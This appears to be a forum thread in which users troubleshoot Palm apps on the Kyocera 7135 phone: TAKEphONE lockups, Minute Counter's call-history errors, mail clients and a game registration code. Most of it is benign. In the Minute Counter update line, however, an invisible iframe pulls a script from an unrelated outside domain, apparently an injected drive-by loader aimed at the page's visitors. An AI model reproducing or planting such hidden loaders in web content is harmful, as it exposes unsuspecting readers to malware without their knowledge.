App: TAKEphONE 4.64i
Type: predictive dialer app
Link: http://www.shsh.com/
Problem:
App works fine for looking up numbers. When it attempts to dial the 7135 locks up with a reverse video screen. Soft reset required to recover. Developer e-mailed.
App: Minute Counter (MC) !!SEE BELOW!! :rdcop
Type: Tracks phone usage
Link: http://home.triad.rr.com/rlwhitt/palm/
Problem:
App won't launch. Gives message:
Kyocera Call History Database not found!
(CallHistoryDB.pdb)
The app then exits without further problems. Developer e-mailed.
Updated:
Newest version of MC (1.11) works great.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I hope they release the new SDK soon. Bummer about minute timer. I was planning on writing a new application that I was hoping would be useable by both the 6035 and 7135, but if they have different call history databases, I probably won't bother making it backwards compatible to the 6035.

Also, in Minute Counter, I don't think there IS a call history DB until you GO INTO the call history the first time. Try going into the Call history and getting back out, THEN run Minute Counter. I've got version 1.10b and it's working perfectly on my 7135.

I downloaded v 1.11 just now (txs for the effort!!!) AND went into Call History but still get "Kyocera Call History application preferances not found or wrong size" error when I try to change the max call history in minutes?? Help this is a MUST have app for the 7135.
I have the same error issue using 1.11 also.
I have did the call history settings, went out of call history, turned off phone, soft reset, all the options checked and no matter what i do i still get the same error.
Kyocer call history applicaiton preferences not found or wrong size. There are not created until you have run that application at least once.
I even went as far as deleting the callhistory db with filez and it still does the same thing...

Hi,
Well - it seems the problem is somewhere in the Kyocera SDK (s/w interface) that worked fine for the 6035, but has problems with the 7135 (the sample applications supplied by Kyocera with the SDK crush, too).
Anyway - I have found a workaround, and now TAKEphONE is usable with the 7135 !
Which version of Multi Mail did you try? I tried MM Pro 3.0 and it totally froze the phone. I'm really bummed bc it was the only app I had luck with getting my corporate email on an IMAP server (we are not even using outlook express).
Regarding Minutes there was a thread discussing this same issue

any idea??????????
Once you go into Call History and change the setting, there is no need to change the SAME setting in Minute Counter. Once you change it in Call History, it is CHANGED for Minute Counter purposes as well. Looking at my Call Data in Minute Counter right now shows 297 calls in my Call History. The menu item doesn't work in Minute Counter, but if you change it in call history, it doesn't matter.

Boinker--Try Inbox2go by dataviz. It support attachments and everything. You just forward your email to their server. They have a 30 day trial.
Use Mobile Mail that comes with the phone. It is 3.1.2 and is the latest version. Mobile Mail and Multi Mail are the same program. I suggest deleting multimail first and then install mobile mail from the Kyo CD.

Doesnt Mobile Mail utilize those plug ins (MA01 for text) for attachments? I can not connect to my server remotly yet so I am only getting my mail on the 7135 when I do a hot synch. I just looked at an email with a word attachment and it is showing it in line and it is all messed up??
As another has already answered, you don't have to set the number of calls in History in MC, it is reading the Call History apps prefs. The only need for MC to have this was to allow users to set the number HIGHER than 999. Looks like the CH prefs on the 7135 are different than on the 6035. So for now, no settings higher than 999 until I get one of these to test on.

Also, Handmark's Monopoly is not taking the registration code. I veified that it was good but it won't take. I'm thinking it may have something to do with it being a free registration I got from being a beta tester. Hope someone will confirm that.
Edited to add: Handmark sent me a new code and it works fine. The old code was only good on the old device used for beta testing.
